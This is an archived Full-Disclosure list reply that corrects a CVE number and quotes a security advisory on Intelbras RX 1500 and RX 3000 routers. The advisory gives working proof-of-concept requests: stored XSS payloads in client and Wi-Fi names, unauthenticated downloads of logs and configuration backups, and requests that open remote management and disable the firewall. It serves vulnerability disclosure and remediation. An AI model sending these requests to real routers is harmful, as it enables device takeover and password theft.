| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAAAPD15=TTtM=n4gaqWcWJ-krbxxUermaoFK+Phx9RnzveN8NA@mail.gmail.com> Date: Mon, 21 Jul 2025 12:19:10 -0300 From: Palula Brasil <palulabrasil@...il.com> To: Gabriel Augusto Vaz de Lima <gabriel.lima@...pest.com.br> Cc: fulldisclosure@...lists.org Subject: Re: [FD] Multiple vulnerabilities in the web management interface of Intelbras routers The following snippet in the text is associated to the wrong CVE number: 2.2 Possibility of injecting JavaScript code into the name of the visiting network (XSS) - CVE-2025-26064 The correct CVE number for item 2.2 is CVE-2025-26065. On Sun, Jul 20, 2025 at 3:22 AM Gabriel Augusto Vaz de Lima via Fulldisclosure <fulldisclosure@...lists.org> wrote: > =====[Tempest Security > Intelligence]========================================== > > Multiple vulnerabilities in the web management interface of Intelbras > routers > > Author: Gabriel Lima <gabriel lima () tempest com br > > > =====[Table of > Contents]====================================================== > > 1. Overview > > 2. Detailed description > > 3. Other contexts & solutions > > 4. Acknowledgements > > 5. Timeline > > 6. References > > =====[1. > Overview]============================================================ > > * Systems affected: > > Intelbras web interface RX 1500 - 2.2.9 > > (verified) (other routers/versions may be affected) > > Intelbras web interface RX 3000 - 1.0.11 > > (verified) (other routers/versions may be affected) > > * Release date: 07/14/2025 > > * Impact: Several vulnerabilities were found providing retrieval of > administrative session tokens and direct unauthenticated access to > sensitive features that allow the recovery of current router configuration. > > The new generation of connection comes via Wi-Fi 6 technology, delivering > more speed, more network efficiency and less interference. Router RX 1500 > [1] and RX 3000 [2] are ideal for residential plans with high-speed plans > and high-performance connections. > > =====[2. Detailed > description]================================================ > > The web management system for the RX 1500 and 3000 routers is designed to > help the device’s administrator configure the device in the best way for > their needs. However, upon carrying out a security research, multiple > vulnerabilities related to XSS and direct unauthenticated access were > spotted. > > As a result of performing this research, two types of vulnerabilities were > found: Cross-Site Scripting (XSS) vulnerabilities and Direct > Unauthenticated Access vulnerabilities. > > In regard to the XSS vulnerabilities, as a means to portray impact > outcomes, an unauthenticated attacker may gain administrative access to the > system and have full control of the router. On the other hand, an attacker > with administrator access is able to create persistence to maintain access. > > Furthermore, in regard to the direct and unauthenticated access > vulnerabilities, the application hosts endpoints that provide the > retrieval of log files and the router's configuration file, which in turn, > stores the device's password and its current settings. An important > highlight regards the fact that any feature can be accessed in an > unauthenticated manner, as long as an administrator is authenticated and > active within the system. > > The following section dissects the XSS issues. > > 2.1 Possibility of injecting JavaScript code into client names (XSS) - > CVE-2025-26064 > > An authenticated threat may inject persistent JavaScript from the connected > clients configuration feature (Home > Connected clients). This problem > occurs due to the lack of character handling in the “Name” field. > > As proof of concept, the following payload was used: > > <script>alert(1)</script> > > Payload used in plain text: > > <script>alert(1)</script> > > The following request pinpoints the insertion of the payload: > > [snippet] > > POST /HNAP1/ HTTP/1.1 > > Host: 10.0.0.1 > > Content-Type: text/xml; charset=utf-8 > > SOAPAction: "http://purenetworks.com/HNAP1/SetClientInfo" > > X-Requested-With: XMLHttpRequest > > Content-Length: 596 > > Cookie: uid=COOKIE-HERE > > <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi=" > http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd=" > http://www.w3.org/2001/XMLSchema" xmlns:soap=" > http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetClientInfo > xmlns=" > http://purenetworks.com/HNAP1/ > > "><ClientInfoLists><ClientInfo><MacAddress>Client-MacAddresss</MacAddress><NickName>PAYLOAD-IN-HTML-ENCODE</NickName><ReserveIP></ReserveIP><secRouter></secRouter><Type>WIFI_5G</Type><COMMAND>change</COMMAND></ClientInfo></ClientInfoLists><COMMAND></COMMAND></SetClientInfo></soap:Body></soap:Envelope> > > [/snippet] > > Upon submitting this request, please note the outcome rendered within the > context of the victim's browser. > > 2.2 Possibility of injecting JavaScript code into the name of the visiting > network (XSS) - CVE-2025-26064 > > An authenticated threat may inject persistent JavaScript from the Guest > Network functionality (in the Settings > Wi-Fi > Guest Network menu). This > problem occurs due to the lack of character handling in the “Wi-Fi network > name” field (both in 2.4GHz and 5GHz). > > As a proof of concept, the following payloads were HTML encoded and > inserted into each field: > > 2.4GHz network: <script>alert(1)</script> > > 5GHz network: <script>alert(2)</script> > > Payloads used in plain text: > > 2.4GHz network: <script>alert(1)</script> > > 5GHz network: <script>alert(2)</script> > > The following portrays an example of the request submitted by the attacker: > > [snippet] > > POST /HNAP1/ HTTP/1.1 > > Host: 10.0.0.1 > > Content-Type: text/xml; charset=utf-8 > > SOAPAction: "http://purenetworks.com/HNAP1/SetMultipleActions" > > X-Requested-With: XMLHttpRequest > > Content-Length: 2991 > > Cookie: uid=COOKIE-HERE > > <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi=" > http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd=" > http://www.w3.org/2001/XMLSchema" xmlns:soap=" > http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetMultipleActions > xmlns="http://purenetworks.com/HNAP1/"><SetWLanRadioSettings xmlns=" > http://purenetworks.com/HNAP1/ > "><RadioID>RADIO_2.4GHz_Guest</RadioID><OpenMainWiFiFirst>false</OpenMainWiFiFirst><Enabled>true</Enabled><Mode>802.11bgn</Mode><SSID>PAYLOAD-IN-HTML-ENCODE-2.4GHz</SSID><SSIDBroadcast>true</SSIDBroadcast><ChannelWidth>20/40</ChannelWidth><Channel>0</Channel><SecondaryChannel>0</SecondaryChannel><QoS>false</QoS><ScheduleName>Always</ScheduleName><TXPower></TXPower><Coexistence>false</Coexistence><WmmCapable></WmmCapable><MuOfdma></MuOfdma><MuMimo></MuMimo><Beamforming></Beamforming><ETxBfEnCond></ETxBfEnCond><TWTSupport></TWTSupport><BssColor></BssColor></SetWLanRadioSettings><SetWLanRadioSecurity > xmlns="http://purenetworks.com/HNAP1/ > "><RadioID>RADIO_2.4GHz_Guest</RadioID><Enabled>false</Enabled><Type>OPEN</Type><Encryption>NONE</Encryption><KeyRenewal></KeyRenewal><RadiusIP1></RadiusIP1><RadiusPort1></RadiusPort1><RadiusSecret1></RadiusSecret1><RadiusIP2></RadiusIP2><RadiusPort2></RadiusPort2><RadiusSecret2></RadiusSecret2><Key>ROUTER-KEY</Key></SetWLanRadioSecurity><SetWLanRadioSettings > xmlns="http://purenetworks.com/HNAP1/ > "><RadioID>RADIO_5GHz_Guest</RadioID><OpenMainWiFiFirst>false</OpenMainWiFiFirst><Enabled>true</Enabled><Mode>802.11anac</Mode><SSID>PAYLOAD-IN-HTML-ENCODE-5GHz</SSID><SSIDBroadcast>true</SSIDBroadcast><ChannelWidth>20/40/80</ChannelWidth><Channel>0</Channel><SecondaryChannel>0</SecondaryChannel><QoS>false</QoS><ScheduleName></ScheduleName><TXPower></TXPower><Coexistence>false</Coexistence><WmmCapable></WmmCapable><MuOfdma></MuOfdma><MuMimo></MuMimo><Beamforming></Beamforming><ETxBfEnCond></ETxBfEnCond><TWTSupport></TWTSupport><BssColor></BssColor></SetWLanRadioSettings><SetWLanRadioSecurity > xmlns="http://purenetworks.com/HNAP1/ > "><RadioID>RADIO_5GHz_Guest</RadioID><Enabled>false</Enabled><Type>OPEN</Type><Encryption>NONE</Encryption><KeyRenewal></KeyRenewal><RadiusIP1></RadiusIP1><RadiusPort1></RadiusPort1><RadiusSecret1></RadiusSecret1><RadiusIP2></RadiusIP2><RadiusPort2></RadiusPort2><RadiusSecret2></RadiusSecret2><Key>ROUTER-KEY</Key></SetWLanRadioSecurity><SetGuestZoneRouterSettings > xmlns="http://purenetworks.com/HNAP1/ > > "><InternetAccessOnly>false</InternetAccessOnly><IPAddress></IPAddress><SubnetMask></SubnetMask><DHCPServer>true</DHCPServer><DHCPRangeStart></DHCPRangeStart><DHCPRangeEnd></DHCPRangeEnd><DHCPLeaseTime>0</DHCPLeaseTime></SetGuestZoneRouterSettings></SetMultipleActions></soap:Body></soap:Envelope> > > [/snippet] > > By accessing the system's home page (namely: the Status page), one can > observe the JavaScript rendering for both fields. > > 2.3 Possibility of multiple JavaScript code injections in the Site Survey > feature (XSS) - CVE-2025-26063 > > The “Site Survey” feature (Management > Site Survey) has the purpose of > displaying nearby active WIFI networks, and presenting their ESSIDs among > other details. However, due to the lack of character handling, whenever an > attacker creates a fake WIFI network containing HTML/JavaScript code (e.g. > “<script>alert(1)</script>”), and the router administrator uses this > feature, the malicious code will be executed at the moment the tab listing > all available ESSIDs is opened. > > As a proof of concept, an SSID with the following name was created: > > <script>alert(1)</script> > > The following portrays an example of the request made by the administrator > upon starting “Site Survey” scan: > > [snippet] > > POST /HNAP1/ HTTP/1.1 > > Host: [redacted] > > SOAPAction: "http://purenetworks.com/HNAP1/igd_wifi_list_scan_start" > > X-Requested-With: XMLHttpRequest > > Content-Length: 357 > > Cookie: [redacted] > > <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi=" > http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd=" > http://www.w3.org/2001/XMLSchema" xmlns:soap=" > http://schemas.xmlsoap.org/soap/envelope/ > "><soap:Body><igd_wifi_list_scan_start > xmlns="http://purenetworks.com/HNAP1/ > > "><radio>2.4g</radio></igd_wifi_list_scan_start></soap:Body></soap:Envelope> > > [/snippet] > > The XSS is executed by hovering the mouse pointer over the network's name > (highlighted in the graphic presented within the router’s/device’s web > management interface) or by opening the nearby devices section. > > The following section dissects the direct unauthenticated access issues. > > 2.4 Incorrect Access Control - CVE-2025-26062 > > This session will address 3 access control breach vulnerabilities, > considered by mitre to be duplicates. For better understanding, they will > be considered only as one topic. > > 2.4.1 Possibility of retrieving router logs > > The given router's administrative interface provides a feature (Management > > System log) that allows an authenticated entity (e.g: an administrator) > to retrieve the router's log file, which may contain potentially sensitive > debug information. However, due to the lack of permissions validation, an > unauthenticated entity can download the file without performing the > authentication procedure. > > The following is an example request used as proof of concept: > > [snippet] > > POST /cgi-bin/dllog.cgi HTTP/1.1 > > Host: 10.0.0.1 > > Content-Type: application/x-www-form-urlencoded > > Content-Length: 13 > > Export=Export > > [/snippet] > > As a result, a log file containing potentially sensitive information is > provided for download. > > > 2.4.2 Possibility of recovering backups of router settings > > The given router's administrative interface provides a feature (Management > > System) that allows an authenticated entity (e.g: an administrator) to > retrieve the router's current configuration file, which may contain > potentially sensitive information pertaining to the environment. However, > due to the lack of permissions validation, an unauthenticated entity can > download the file without performing the authentication procedure. > > To exploit the aforementioned concept, the following snippet illustrates > the request made at the affected point by an unauthenticated attacker > retrieving the router's configuration file, as well as showing part of the > contents of the ".cfg" file in the request response: > > [snippet] > > POST /cgi-bin/ExportSettings.sh HTTP/1.1 > > Host: 10.0.0.1 > > Content-Type: application/x-www-form-urlencoded > > Content-Length: 13 > > Export=Export > > [/snippet] > > As a result of submitting the previously shown request, the retrieval of > the .cfg backup file is done without the need for providing proper > authorization. > > 2.4.3 Possibility of accessing various functionalities in an > unauthenticated manner > > Various router features, such as editing firewall rules, configuring Wi-Fi > specifications, and changing router security rules and policies, were found > to be accessible in an unauthenticated manner if an administrator > synchronically accessed the router's administrative interface at the moment > of exploitation. > > In other words, the only caveat necessary to exploit this unauthenticated > access is having an administrator logged in at the moment of exploitation. > > The following snippet represents a request to render the router's > administrative interface publicly accessible (e.g.: accessible from the > Internet): > > [snippet] > > POST /HNAP1/ HTTP/1.1 > > Host: 10.0.0.1 > > Content-Type: text/xml; charset=utf-8 > > SOAPAction: "http://purenetworks.com/HNAP1/SetAdministrationSettings" > > X-Requested-With: XMLHttpRequest > > Content-Length: 491 > > <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi=" > http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd=" > http://www.w3.org/2001/XMLSchema" xmlns:soap=" > http://schemas.xmlsoap.org/soap/envelope/ > "><soap:Body><SetAdministrationSettings > xmlns="http://purenetworks.com/HNAP1/ > > "><HTTPS>false</HTTPS><RemoteMgt>true</RemoteMgt><RemoteMgtPort>8080</RemoteMgtPort><RemoteMgtHTTPS>false</RemoteMgtHTTPS><InboundFilter></InboundFilter></SetAdministrationSettings></soap:Body></soap:Envelope> > > [/snippet] > > The following snippet portrays a request with the purpose of disabling the > router's Denial of Service (DoS) protection: > > [snippet] > > POST /HNAP1/ HTTP/1.1 > > Host: 10.0.0.1 > > Content-Type: text/xml; charset=utf-8 > > SOAPAction: "http://purenetworks.com/HNAP1/SetFirewallEnableSettings" > > X-Requested-With: XMLHttpRequest > > Content-Length: 381 > > <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi=" > http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd=" > http://www.w3.org/2001/XMLSchema" xmlns:soap=" > http://schemas.xmlsoap.org/soap/envelope/ > "><soap:Body><SetFirewallEnableSettings > xmlns="http://purenetworks.com/HNAP1/ > > "><Firewall_Enabled>false</Firewall_Enabled></SetFirewallEnableSettings></soap:Body></soap:Envelope> > > [/snippet] > > Other features are accessible in an unauthenticated manner, as long as the > request is sent when the administrator is active. > > According to the arguments disclosed in this section, various attack > vectors for administrative access originating from the perspective of an > unauthenticated user becomes feasible. Furthermore, once authenticated as > an administrator, an attacker would be able to generate persistence with > the same approaches. > > =====[3. Other contexts & > solutions]========================================== > > In regard to the XSS disclosed issues, it is recommended that all > information coming from third parties (databases, other applications, > client-side, etc.) have their special characters converted to the **HTML > Entities** character set. Moreover, the data must be semantically filtered > to guarantee that it conforms to the expected format and is free of any > undesired characters. > > In regard to the unauthenticated access disclosed issues, it is strongly > recommended that changes be made to the application's existing session > management and access control, such that access to sensitive > functionalities is available only to authenticated users, and that these > users perform only actions permitted by their authorization profile. > > Moreover, it is important to highlight that all logic that determines > whether a user has the necessary permissions to perform a certain action > must execute **exclusively on the server-side**. > > =====[4. > Acknowledgements]==================================================== > > - Joaquim Brasil de Oliveira < joaquim brasil () tempest com br > > > - Tempest Security Intelligence[3] > > =====[5. > Timeline]============================================================ > > 07/15/2024 - We contacted the manufacturer reporting an XSS vulnerability > in the Site Survey functionality; > > 07/16/2024 - The vendor requested contact information; > > 07/17/2024 - Contact information has been sent to the supplier; > > 07/17/2024 - The vendor has begun the process of validating and > acknowledging the first bug reported; > > 07/22/2024 - A full report has been sent with all the other discovered > vulnerabilities; > > 07/25/2024 - The vendor acknowledged all the vulnerabilities reported in > the RX 1500 and RX 3000 devices; > > 09/19/2024 - The vendor has released the beta version of the corrected > firmware 2.2.12 > > 09/23/2024 - All points have been retested and fixed; > > 01/27/2025 - Request CVE IDs from MITRE; > > 02/24/2025 - MITRE sent the CVEs IDs; > > 07/14/2025 - Publication date. > > > > =====[6. > References]========================================================== > > [1] <http://www.asus.com/Networking/RTAC68U/> > https://www.intelbras.com/pt-br/roteador-wi-fi-6-dual-band-rx-1500 > > [2] http://intelbras.com/pt-br/roteador-wireless-rx-3000 > > [3] https://tempest.com.br > > -- > > *Esta mensagem é para uso exclusivo de seu destinatário e pode conter > informações privilegiadas e confidenciais. Todas as informações aqui > contidas devem ser tratadas como confidenciais e não devem ser divulgadas > a > terceiros sem o prévio consentimento por escrito da Tempest. Se você não é > o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste > caso, por favor, notifique o remetente da mesma e destrua imediatamente a > mensagem.* > > * > * > *This message is intended solely for the use of its > addressee and may contain privileged or confidential information. All > information contained herein shall be treated as confidential and shall > not > be disclosed to any third party without Tempest’s prior written approval. > If you are not the addressee you should not distribute, copy or file this > message. In this case, please notify the sender and destroy its contents > immediately.** > * > * > * > _______________________________________________ > Sent through the Full Disclosure mailing list > https://nmap.org/mailman/listinfo/fulldisclosure > Web Archives & RSS: https://seclists.org/fulldisclosure/ -- Palula Brasil palulabrasil*SPAM*gmail.com 24E5 3ED3 E77C F868 805D F843 E156 6DB8 49FB 8B40 _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists